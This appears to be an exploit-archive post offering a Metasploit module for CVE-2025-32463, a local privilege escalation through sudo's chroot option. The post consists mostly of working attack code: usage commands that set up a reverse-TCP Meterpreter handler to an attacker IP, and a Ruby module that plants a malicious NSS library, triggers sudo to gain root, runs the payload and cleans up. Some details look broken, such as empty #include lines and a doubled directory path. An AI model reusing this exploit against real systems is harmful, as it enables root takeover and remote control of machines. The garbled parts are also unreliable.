============================================================================================================================================= | # Title : sudo 1.9.17 Sudo Chroot Privilege Escalation | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://www.sudo.ws/ | ============================================================================================================================================= [+] Summary : This Metasploit module exploits CVE-2025-32463, a local privilege escalation vulnerability in Sudo's chroot functionality. The vulnerability allows attackers to load malicious NSS (Name Service Switch) modules from within a chroot environment, leading to arbitrary code execution as root. [+] Integration Methods : 1. **Standalone Exploit Module** - Custom Ruby module for direct exploitation - Automated chroot environment setup - Payload execution as root 2. **Payload Integration** - Modified NSS module with Meterpreter payload - Reverse TCP connection establishment - Root-level Meterpreter session 3. **Multi-Handler Approach** - External exploit triggering Meterpreter - Payload delivery via HTTP/SMB - Session management through handler [+] Module Components : **Core Functions:** - `check()`: Verifies sudo chroot capability - `exploit()`: Main exploitation routine - `generate_nss_module()`: Creates malicious NSS library - `compile_nss_module()`: Compiles shared object **Exploitation Flow:** 1. Vulnerability verification 2. Chroot environment creation 3. Malicious NSS module generation 4. Payload integration 5. Privilege escalation trigger 6. Meterpreter session establishment [+] Usage : use exploit/linux/local/sudo_chroot_priv_esc set SESSION 1 set LHOST 192.168.1.100 set LPORT 4444 exploit or save as : sudo_chroot_exploit.rb use exploit/multi/handler set PAYLOAD linux/x64/meterpreter/reverse_tcp set LHOST 192.168.1.100 set LPORT 4444 set ExitOnSession false exploit -j [+] POC : ## # Module for CVE-2025-32463 Sudo Chroot Privilege Escalation ## require 'msf/core' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Sudo Chroot NSS Privilege Escalation (CVE-2025-32463)', 'Description' => %q{ This module exploits CVE-2025-32463, a privilege escalation vulnerability in sudo's chroot functionality that allows loading malicious NSS modules. }, 'License' => MSF_LICENSE, 'Author' => ['indoushka'], 'References' => [ ['CVE', '2025-32463'] ], 'Platform' => ['linux'], 'Arch' => [ARCH_X64, ARCH_X86], 'SessionTypes' => ['shell', 'meterpreter'], 'Targets' => [['Automatic', {}]], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'PrependSetuid' => true }, 'DisclosureDate' => '2025-11-26', 'DefaultTarget' => 0 )) register_options([ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ]) end def check if command_exists?('sudo') check_cmd = 'sudo -n -l | grep -i chroot' result = cmd_exec(check_cmd) if result =~ /chroot/ return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end else return Exploit::CheckCode::Safe end end def exploit working_dir = "#{datastore['WritableDir']}/.chroot_exploit" cmd_exec("mkdir -p #{working_dir}/#{working_dir}/{lib,etc,bin}") nss_payload = generate_nss_module nsswitch_conf = "passwd: Xfiles\ngroup: files\nshadow: files\n" write_file("#{working_dir}/etc/nsswitch.conf", nsswitch_conf) if compile_nss_module(working_dir, nss_payload) print_status("Malicious NSS module compiled successfully") print_status("Triggering privilege escalation...") cmd_exec("sudo -R #{working_dir} /bin/id") whoami = cmd_exec('whoami') if whoami =~ /root/ print_good("Successfully obtained root privileges!") print_status("Executing payload as root...") cmd_exec("/bin/bash -c \"#{payload.encoded}\"") else print_error("Privilege escalation failed") end else print_error("Failed to compile NSS module") end cmd_exec("rm -rf #{working_dir}") end def generate_nss_module payload_file = "/tmp/.msf_payload" write_file(payload_file, payload.encoded) cmd_exec("chmod +x #{payload_file}") nss_code = %Q{ #include #include #include #include #include __attribute__((constructor)) void init() { unsetenv("LD_PRELOAD"); setuid(0); setgid(0); system("#{payload_file} &"); system("rm -f #{payload_file}"); } enum nss_status _nss_Xfiles_getpwnam_r(const char *name, struct passwd *pwd, char *buf, size_t buflen, int *errnop) { return NSS_STATUS_NOTFOUND; } } return nss_code end def compile_nss_module(working_dir, source_code) source_file = "#{working_dir}/payload.c" output_file = "#{working_dir}/lib/libnss_Xfiles.so.2" write_file(source_file, source_code) compile_cmd = "gcc -fPIC -shared -o #{output_file} #{source_file} -nostartfiles" result = cmd_exec(compile_cmd) # Cleanup source cmd_exec("rm -f #{source_file}") return file_exist?(output_file) end def command_exists?(cmd) result = cmd_exec("which #{cmd}") return result.include?('/') end end Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================